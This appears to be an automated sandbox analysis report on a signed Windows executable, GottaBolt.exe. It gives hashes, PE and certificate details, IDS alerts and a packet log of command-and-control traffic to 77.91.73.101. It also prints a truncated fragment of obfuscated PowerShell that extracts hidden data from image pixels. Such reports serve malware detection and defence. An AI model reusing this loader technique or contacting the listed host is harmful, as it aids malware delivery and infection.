Preview:	Add-Type -AssemblyName System.Drawing...Add-Type -AssemblyName System......Function vjxyLpNkowWzxlobVAii {...[CmdletBinding()]... param(... [Parameter(Mandatory=$true)] [String]$GHF,... [Parameter(Mandatory=$true)] [String]$bts... )......$cqySVtDOOmEiPYsNAWMW = [System.Drawing.Bitmap]::FromFile((Resolve-Path $GHF).ProviderPath)...$ZUdZaJZquKQcpBOTOoTW = ""...$REmOYzmabRsWjIrLTkQT = [System.Text.StringBuilder]::new()...for ($RQNECTfFTFLXJJwRyzax = 0; $RQNECTfFTFLXJJwRyzax -le $cqySVtDOOmEiPYsNAWMW.Height-1; $RQNECTfFTFLXJJwRyzax++){... for ($jlcUbqlDwCGvKKQNFaNF = 0; $jlcUbqlDwCGvKKQNFaNF -le $cqySVtDOOmEiPYsNAWMW.Width-1; $jlcUbqlDwCGvKKQNFaNF++){... $JFWMYdLLHTsJIdhevmem = $cqySVtDOOmEiPYsNAWMW.GetPixel($jlcUbqlDwCGvKKQNFaNF,$RQNECTfFTFLXJJwRyzax)... $hDUeYONrodzpwmbYPrWS = [System.Drawing.ColorTranslator]::ToHtml($JFWMYdLLHTsJIdhevmem)... $hDUeYONrodzpwmbYPrWS = $hDUeYONrodzpwmbYPrWS.replace("#000000","")... [void]$REmOYzmabRsWjIrLTkQT.Append($hDUeYONrodzpwmb

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.503980671997943
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	GottaBolt.exe
File size:	25'560 bytes
MD5:	981c56e26ae89a9190d1f1db9d2683ce
SHA1:	43a46c1736a4f9f5264dab79761b44e2ea0cc18c
SHA256:	79b6e63218982c1e85a5e1798c5484e7e034cfecbe9f2da604f668fda8428af4
SHA512:	444c9d6bd90ef779493b13f1b966c684ac95d8d0f3065b02a2e0853fd9cca5afaed98808acb01f6e5c8d760a432e4450165089037cc86b802bb3549ae8b55a8c
SSDEEP:	384:pVCnS83YG0Chg4thBMXIwTiiFLfVm3bIncwVJC2FpfhCm/iWD:5zFChgVWiFwkn7q2FGK/
TLSH:	36B26D52BEA8C365DA764F71D8F201120E72EEAB5871D99D28C4B0455DF37827A13A3C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...F.W..........."...0..,............... .....@..... ...............................X....`...@......@............... .....

File Icon


Icon Hash:	5d7d6d5c737b0b13

Static PE Info

General

Entrypoint:	0x140000000
Entrypoint Section:
Digitally signed:	true
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9557AA46 [Tue May 25 10:13:26 2049 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	11/11/2024 17:44:37 11/11/2025 11:55:28
Subject Chain	OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=INDCARE AFRICA LIMITED, SERIALNUMBER=CPR/2009/10319, O=INDCARE AFRICA LIMITED, L=Nairobi, C=KE
Version:	3
Thumbprint MD5:	94B8889ECAB18DBC7A0FE22A3EFB1EC9
Thumbprint SHA-1:	643F5BE0BC3ED89ADE028AAF7AA5D50B84C50E8F
Thumbprint SHA-256:	1CB573AB94C9AFE77CAEF2718FD4ECCEAFFF3A7B0AA0BBC56B5D3C792BC58B92
Serial:	69C55475FFD7B1A2474296E14C5CF8D9

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6000	0x1768	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4600	0x1dd8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x4980	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2a30	0x2c00	6b7fab5f38c02d4b87ba53c166f0c89c	False	0.5116299715909091	data	5.487360602684014	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x6000	0x1768	0x1800	e2e8d24ecac2dfbfaed968d5b69faa65	False	0.5139973958333334	data	5.51672574409712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x6100	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5539399624765479
RT_GROUP_ICON	0x71b8	0x14	data	1.1
RT_VERSION	0x71dc	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data	0.40308370044052866
RT_MANIFEST	0x7578	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-22T17:11:47.153718+0100	2056491	ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)	1	192.168.2.5	49718	77.91.73.101	443	TCP
2024-11-22T17:11:49.665986+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49719	77.91.73.101	443	TCP
2024-11-22T17:11:49.665986+0100	2056491	ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)	1	192.168.2.5	49719	77.91.73.101	443	TCP
2024-11-22T17:11:52.199191+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49720	77.91.73.101	443	TCP
2024-11-22T17:11:52.199191+0100	2056491	ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)	1	192.168.2.5	49720	77.91.73.101	443	TCP
2024-11-22T17:11:54.709108+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49722	77.91.73.101	443	TCP
2024-11-22T17:11:54.709108+0100	2056491	ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)	1	192.168.2.5	49722	77.91.73.101	443	TCP
2024-11-22T17:11:57.233457+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49729	77.91.73.101	443	TCP
2024-11-22T17:11:57.233457+0100	2056491	ET MALWARE Win32/Knitting Industry Co. CnC Activity (GET)	1	192.168.2.5	49729	77.91.73.101	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 17:11:45.116569042 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:45.116640091 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:45.116708040 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:45.141577959 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:45.141594887 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:46.586322069 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:46.586402893 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:46.590002060 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:46.590012074 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:46.590331078 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:46.633641958 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:46.645217896 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:46.687364101 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:47.153736115 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:47.153811932 CET	443	49718	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:47.153960943 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:47.167503119 CET	49718	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:47.682136059 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:47.682209015 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:47.682275057 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:47.682708025 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:47.682725906 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:49.110991955 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:49.116015911 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:49.116034031 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:49.666012049 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:49.666099072 CET	443	49719	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:49.666277885 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:49.667010069 CET	49719	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:50.212728977 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:50.212802887 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:50.212886095 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:50.213251114 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:50.213265896 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:51.644912958 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:51.646565914 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:51.646605015 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:52.199234962 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:52.199330091 CET	443	49720	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:52.199652910 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:52.199934959 CET	49720	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:52.712506056 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:52.712631941 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:52.712729931 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:52.713021040 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:52.713064909 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.153199911 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.155042887 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:54.155071974 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.709125996 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.709147930 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.709216118 CET	443	49722	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:54.709213972 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:54.709273100 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:54.709772110 CET	49722	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:55.228553057 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:55.228599072 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:55.228689909 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:55.229590893 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:55.229607105 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:56.676675081 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:56.678353071 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:56.678386927 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:57.233639956 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:57.233855963 CET	443	49729	77.91.73.101	192.168.2.5
Nov 22, 2024 17:11:57.233931065 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:11:57.239975929 CET	49729	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:01.860649109 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:01.860661030 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:01.860732079 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:01.863651037 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:01.863667965 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.293415070 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.293512106 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:03.295532942 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:03.295547009 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.295866013 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.302592993 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:03.347326994 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.931538105 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.931567907 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.931585073 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.931678057 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:03.931700945 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:03.931750059 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.088020086 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.088107109 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.088121891 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.088140011 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.088175058 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.088192940 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.134751081 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.134798050 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.134845018 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.134862900 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.134902954 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.134929895 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.276416063 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.276443005 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.276525974 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.276542902 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.276581049 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.308881998 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.308907986 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.308967113 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.308979988 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.309017897 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.309039116 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.338891983 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.338958025 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.338979006 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.338995934 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.339021921 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.339037895 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.467852116 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.467876911 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.467948914 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.467967987 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.468010902 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.494884968 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.494911909 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.494980097 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.494997025 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.495024920 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.495043039 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.512448072 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.512470007 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.512563944 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.512577057 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.512613058 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.536360979 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.536391020 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.536464930 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.536478996 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.536562920 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.556890011 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.556911945 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.557018042 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.557033062 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.557069063 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.659533024 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.659558058 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.659637928 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.659658909 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.659857988 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.674252987 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.674293041 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.674335003 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.674345016 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.674384117 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.688054085 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.688093901 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.688136101 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.688148975 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.688189983 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.688210011 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.703155994 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.703224897 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.703252077 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.703267097 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.703294039 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.703324080 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.717688084 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.717721939 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.717801094 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.717813015 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.717842102 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.717866898 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.731616020 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.731664896 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.731699944 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.731714010 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.731759071 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.746407032 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.746424913 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.746495008 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.746507883 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.746551991 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.758889914 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.758923054 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.758974075 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.758984089 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.759022951 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.859973907 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.859996080 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.860083103 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.860106945 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.860146999 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.870007992 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.870028019 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.870086908 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.870100975 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.870140076 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.881824017 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.881880999 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.881907940 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.881922007 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.881952047 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.881970882 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.893520117 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.893565893 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.893603086 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.893618107 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.893650055 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.893673897 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.902751923 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.902822018 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.902838945 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.902852058 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.902882099 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.902904034 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.912748098 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.912792921 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.912825108 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.912837982 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.912878990 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.921072006 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.921118021 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.921159029 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.921169996 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.921195984 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.921219110 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.930151939 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.930201054 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.930314064 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.930314064 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:04.930325031 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:04.930468082 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.060224056 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.060271025 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.060314894 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.060333967 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.060364962 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.060383081 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.068057060 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.068085909 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.068130016 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.068142891 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.068172932 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.068190098 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.077115059 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.077145100 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.077198029 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.077210903 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:05.077234030 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:05.077255964 CET	49744	443	192.168.2.5	77.91.73.101
